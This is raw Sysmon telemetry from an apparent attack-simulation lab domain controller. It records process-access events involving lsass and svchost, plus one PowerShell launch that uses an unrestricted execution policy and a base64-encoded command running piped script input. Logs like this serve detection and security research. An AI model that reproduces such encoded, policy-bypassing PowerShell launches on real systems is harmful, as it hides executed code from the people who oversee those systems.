10341000x8000000000000000107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:14.856{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.856{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:14.856{59A5CD1D-8E18-6005-BD02-00000000A201}23402628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95c9331b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95133e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95be54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+950f4a0c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95152edb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95136540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95136540(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67
958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951363d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95128356(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95134889(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9513447c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+951341a5(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95133e76(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+95be54db(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9511acd7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+9511a2a7(wow64) 154100x800000000000000098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.868{59A5CD1D-8E1A-6005-BE02-00000000A201}2264C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E18-6005-43DF-0F0000000000}0xfdf430HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x800000000000000097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:14.793{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.793{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
11241100x800000000000000095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.059{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_qppsxx25.3ta.ps12021-01-18 13:33:14.059 10341000x800000000000000094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:14.043{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E18-6005-BD02-00000000A201}2340C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:15.122{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:15.122{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.122{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8E18-6005-BB02-00000000A201}42204684C:\Windows\system32\conhost.exe{59A5CD1D-8E1B-6005-BF02-00000000A201}4056C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:15.012{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 